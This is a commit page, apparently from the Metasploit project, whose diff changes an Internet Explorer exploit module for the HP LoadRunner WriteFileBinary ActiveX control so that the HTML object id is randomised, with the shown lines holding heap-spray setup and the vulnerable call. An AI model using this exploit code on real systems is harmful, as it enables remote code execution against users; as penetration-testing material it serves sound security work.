Skip to content

Commit f59f57e

Browse files
author
jvazquez-r7
committed
Randomize object id
1 parent 66fa1b4 commit f59f57e

File tree

1 file changed

+3
-2
lines changed

1 file changed

+3
-2
lines changed

modules/exploits/windows/browser/hp_loadrunner_writefilebinary.rb

Lines changed: 3 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -215,6 +215,7 @@ def get_payload(t, cli)
215215
def load_exploit_html(my_target, cli)
216216
p = get_payload(my_target, cli)
217217
js = ie_heap_spray(my_target, p)
218+
object_id = rand_text_alpha(rand(10) + 8)
218219

219220
html = %Q|
220221
<html>
@@ -224,9 +225,9 @@ def load_exploit_html(my_target, cli)
224225
</script>
225226
</head>
226227
<body>
227-
<object classid='clsid:8D9E2CC7-D94B-4977-8510-FB49C361A139' id='poc'></object>
228+
<object classid='clsid:8D9E2CC7-D94B-4977-8510-FB49C361A139' id='#{object_id}'></object>
228229
<script language='javascript'>
229-
poc.WriteFileBinary("#{rand_text_alpha(4+ rand(4))}", 0x0c0c0c0c);
230+
#{object_id}.WriteFileBinary("#{rand_text_alpha(4+ rand(4))}", 0x0c0c0c0c);
230231
</script>
231232
</body>
232233
</html>

0 commit comments

Comments
 (0)